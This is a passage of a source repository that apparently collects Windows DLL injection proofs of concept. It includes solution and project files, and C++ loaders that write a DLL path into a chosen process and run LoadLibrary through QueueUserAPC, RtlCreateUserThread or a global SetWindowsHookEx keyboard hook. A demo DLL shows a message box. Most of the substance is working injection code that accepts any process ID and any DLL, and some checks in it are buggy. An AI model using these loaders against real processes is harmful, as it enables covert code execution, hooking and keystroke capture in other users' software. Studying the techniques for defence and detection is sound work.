{441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x64.ActiveCfg = Debug|x64 17 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x64.Build.0 = Debug|x64 18 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Debug|x86.Build.0 = Debug|Win32 20 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x64.ActiveCfg = Release|x64 21 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x64.Build.0 = Release|x64 22 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x86.ActiveCfg = Release|Win32 23 | {441CCAD0-919A-4882-87A6-DB9834766DC4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {2805A189-2E03-42F8-B8BF-2D9769C5464F} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-QueueUserAPC.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | int injectIntoPID(int process) 11 | { 12 | DWORD pid = (DWORD)process; 13 | // const char* dll = "C:\\v.dll"; 14 | PCWSTR pszLibFile = L"C:\\v.dll"; 15 | int cb = (lstrlenW(pszLibFile) + 1) * sizeof(wchar_t); 16 | 17 | 18 | //Gets the process handle for the target process 19 | HANDLE hProcess = OpenProcess( 20 | PROCESS_VM_OPERATION | 21 | PROCESS_VM_WRITE, 22 | FALSE, pid); 23 | if (hProcess == NULL) 24 | { 25 | printf(TEXT("[-] Error: Could not open process for PID (%d).\n"), pid); 26 | return(1); 27 | } 28 | 29 | 30 | LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE); 31 | if (pszLibFileRemote == NULL) 32 | { 33 | printf(TEXT("[-] Error: Could not allocate memory inside PID (%d).\n"), pid); 34 | return(1); 35 | } 36 | 37 | LPVOID pfnThreadRtn = (LPVOID)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 38 | if (pfnThreadRtn == NULL) 39 | { 40 | printf(TEXT("[-] Error: Could not find LoadLibraryA function inside kernel32.dll library.\n")); 41 | return(1); 42 | } 43 | 44 | DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, cb, NULL); 45 | if (n == 0) 46 | { 47 | printf(TEXT("[-] Error: Could not write any bytes into the PID (%d) address space.\n"), pid); 48 | return(1); 49 | } 50 | 51 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); 52 | if (hSnapshot == INVALID_HANDLE_VALUE) 53 | { 54 | printf(TEXT("[-] Error: Unable to get thread information\n")); 55 | return(1); 56 | } 57 | 58 | DWORD threadId = 0; 59 | THREADENTRY32 threadEntry; 60 | threadEntry.dwSize = sizeof(THREADENTRY32); 61 | 62 | BOOL bResult = Thread32First(hSnapshot, &threadEntry); 63 | while (bResult) 64 | 65 | { 66 | bResult = Thread32Next(hSnapshot, &threadEntry); 67 | if (bResult) 68 | { 69 | if (threadEntry.th32OwnerProcessID == pid) 70 | { 71 | threadId = threadEntry.th32ThreadID; 72 | 73 | printf(TEXT("[+] Using thread: %i\n"), threadId); 74 | HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId); 75 | if (hThread == NULL) 76 | printf(TEXT("[-] Error: Can't open thread. Continuing to try other threads...\n")); 77 | else 78 | { 79 | DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote); 80 | if (!dwResult) 81 | printf(TEXT("[-] Error: Couldn't call QueueUserAPC on thread> Continuing to try othrt threads...\n")); 82 | else 83 | printf(TEXT("[+] Success: DLL injected via QueueUserAPC().\n")); 84 | getchar(); 85 | CloseHandle(hThread); 86 | } 87 | } 88 | } 89 | } 90 | 91 | if (!threadId) 92 | printf(TEXT("[-] Error: No threads found in thr target process\n")); 93 | 94 | CloseHandle(hSnapshot); 95 | CloseHandle(hProcess); 96 | 97 | return(0); 98 | } 99 | 100 | int main(int argc, char* argv) 101 | { 102 | int pid; 103 | puts("Inject into which PID: "); 104 | scanf_s("%u", &pid); 105 | puts("Method used to attach thread is : QueueUserAPC"); 106 | int result = injectIntoPID(pid); 107 | if (result == -1) 108 | { 109 | puts("Could not inject into PID"); 110 | } 111 | system("pause"); 112 | } 113 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {441CCAD0-919A-4882-87A6-DB9834766DC4} 24 | Win32Proj 25 | DLLInjectionQueueUserAPC 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-RtlCreateUserThread", "DLLInjection-RtlCreateUserThread\DLLInjection-RtlCreateUserThread.vcxproj", "{43772772-9FB1-4E36-B862-4347375C4D2C}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x64.ActiveCfg = Debug|x64 17 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x64.Build.0 = Debug|x64 18 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x86.ActiveCfg = Debug|Win32 19 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Debug|x86.Build.0 = Debug|Win32 20 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x64.ActiveCfg = Release|x64 21 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x64.Build.0 = Release|x64 22 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x86.ActiveCfg = Release|Win32 23 | {43772772-9FB1-4E36-B862-4347375C4D2C}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {5BA9F0A7-D4FB-45AC-8616-C917093DBFF5} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-RtlCreateUserThread.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | // ConsoleApplication2.cpp : This file contains the 'main' function. Program execution begins and ends there. 5 | // 6 | 7 | #include "pch.h" 8 | #include 9 | #include 10 | #include 11 | 12 | HANDLE RtlCreateUserThread( 13 | HANDLE hProcess, 14 | LPVOID lpBaseAddress, 15 | LPVOID lpSpace 16 | ) 17 | { 18 | //The prototype of RtlCreateUserThread from undocumented.ntinternals.com 19 | typedef DWORD(WINAPI * functypeRtlCreateUserThread)( 20 | HANDLE ProcessHandle, 21 | PSECURITY_DESCRIPTOR SecurityDescriptor, 22 | BOOL CreateSuspended, 23 | ULONG StackZeroBits, 24 | PULONG StackReserved, 25 | PULONG StackCommit, 26 | LPVOID StartAddress, 27 | LPVOID StartParameter, 28 | HANDLE ThreadHandle, 29 | LPVOID ClientID 30 | ); 31 | //Get handle for ntdll which contains RtlCreateUserThread 32 | HANDLE hRemoteThread = NULL; 33 | HMODULE hNtDllModule = GetModuleHandle("ntdll.dll"); 34 | if (hNtDllModule == NULL) 35 | { 36 | return NULL; 37 | } 38 | functypeRtlCreateUserThread funcRtlCreateUserThread = (functypeRtlCreateUserThread)GetProcAddress(hNtDllModule, "RtlCreateUserThread"); 39 | if (!funcRtlCreateUserThread) 40 | { 41 | return NULL; 42 | } 43 | funcRtlCreateUserThread(hProcess, NULL, 0, 0, 0, 0, lpBaseAddress, lpSpace, 44 | &hRemoteThread, NULL); 45 | DWORD lastError = GetLastError(); 46 | return hRemoteThread; 47 | } 48 | 49 | 50 | 51 | int injectIntoPID(int process) 52 | { 53 | DWORD pid = (DWORD)process; 54 | const char* dll = "C:\\v.dll"; 55 | //Gets the process handle for the target process 56 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 57 | if (OpenProcess == NULL) 58 | { 59 | puts("Could not find process"); 60 | } 61 | //Retrieves kernel32.dll module handle for getting loadlibrary base address 62 | HMODULE hModule = GetModuleHandle("kernel32.dll"); 63 | //Gets address for LoadLibraryA in kernel32.dll 64 | LPVOID lpBaseAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryA"); 65 | if (lpBaseAddress == NULL) 66 | { 67 | puts("Unable to locate LoadLibraryA"); 68 | return -1; 69 | } 70 | //Allocates space inside for inject.dll to our target process 71 | LPVOID lpSpace = (LPVOID)VirtualAllocEx(hProcess, NULL, strlen(dll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 72 | if (lpSpace == NULL) 73 | { 74 | printf("Could not allocate memory in process %u", (int)process); 75 | return -1; 76 | } 77 | //Write inject.dll to memory of process 78 | int n = WriteProcessMemory(hProcess, lpSpace, dll, strlen(dll), NULL); 79 | if (n == 0) 80 | { 81 | puts("Could not write to process's address space"); 82 | return -1; 83 | } 84 | HANDLE hThread; 85 | hThread = RtlCreateUserThread(hProcess, lpBaseAddress, lpSpace); 86 | 87 | if (hThread == NULL) 88 | { 89 | return -1; 90 | } 91 | else 92 | { 93 | DWORD threadId = GetThreadId(hThread); 94 | DWORD processId = GetProcessIdOfThread(hThread); 95 | printf("Injected thread id: %u for pid: %u", threadId, processId); 96 | getchar(); 97 | getchar(); 98 | getchar(); 99 | CloseHandle(hProcess); 100 | return 0; 101 | } 102 | } 103 | 104 | int main(int argc, char* argv) 105 | { 106 | int pid; 107 | puts("Inject into which Process ID: "); 108 | scanf_s("%u", &pid); 109 | puts("Method used here is - RtlCreateUserThread"); 110 | int result = injectIntoPID(pid); 111 | if (result == -1) 112 | { 113 | puts("Could not inject into PID"); 114 | } 115 | system("pause"); 116 | } 117 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {43772772-9FB1-4E36-B862-4347375C4D2C} 24 | Win32Proj 25 | DLLInjectionRtlCreateUserThread 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-RtlCreateUserThread/DLLInjection-RtlCreateUserThread/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-SetWindowsHookEx", "DLLInjection-SetWindowsHookEx\DLLInjection-SetWindowsHookEx.vcxproj", "{8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x64.ActiveCfg = Debug|x64 17 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x64.Build.0 = Debug|x64 18 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x86.ActiveCfg = Debug|Win32 19 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Debug|x86.Build.0 = Debug|Win32 20 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x64.ActiveCfg = Release|x64 21 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x64.Build.0 = Release|x64 22 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x86.ActiveCfg = Release|Win32 23 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {10CC855F-CB4D-4E4B-8587-6B17D28367A5} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-SetWindowsHookEx.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | 14 | int _tmain(int argc, _TCHAR* argv[]) 15 | { 16 | 17 | /* 18 | * Load library in which we'll be hooking our functions. 19 | */ 20 | HMODULE dll = LoadLibrary("C:\\PoC_Dll.dll"); 21 | if (dll == NULL) { 22 | printf("The DLL could not be found.\n"); 23 | getchar(); 24 | return -1; 25 | } 26 | 27 | /* 28 | * Get the address of the function inside the DLL. 29 | */ 30 | HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "poc"); 31 | if (addr == NULL) { 32 | printf("The function was not found.\n"); 33 | getchar(); 34 | return -1; 35 | } 36 | 37 | /* 38 | * Window name 39 | */ 40 | unsigned long procID; 41 | HWND targetWnd = FindWindow(NULL, "notepad++"); 42 | GetWindowThreadProcessId(targetWnd, &procID); 43 | 44 | /* 45 | * Hook the function. 46 | */ 47 | HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, 0); 48 | //HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, keyboard_hook, dll, 0); 49 | if (handle == NULL) { 50 | printf("The KEYBOARD could not be hooked.\n"); 51 | } 52 | 53 | /* 54 | * Unhook the function. 55 | */ 56 | printf("Program successfully hooked.\nPress enter to unhook the function and stop the program.\n"); 57 | getchar(); 58 | UnhookWindowsHookEx(handle); 59 | 60 | return 0; 61 | } 62 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069} 24 | Win32Proj 25 | DLLInjectionSetWindowsHookEx 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PoC_Dll", "PoC_Dll\PoC_Dll.vcxproj", "{6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x64.ActiveCfg = Debug|x64 17 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x64.Build.0 = Debug|x64 18 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x86.ActiveCfg = Debug|Win32 19 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x86.Build.0 = Debug|Win32 20 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x64.ActiveCfg = Release|x64 21 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x64.Build.0 = Release|x64 22 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x86.ActiveCfg = Release|Win32 23 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C55E8844-FBDD-49B7-9C02-C80AC9B694F5} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.cpp: -------------------------------------------------------------------------------- 1 | // PoC_Dll.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | //extern "C" __declspec(dllexport) int poc(int code, WPARAM wParam, LPARAM lParam) { 7 | extern "C" __declspec(dllexport) BOOL poc() { 8 | MessageBox(NULL, "POC called!", "Inject All The Things!", 0); 9 | 10 | //return(CallNextHookEx(NULL, code, wParam, lParam)); 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | 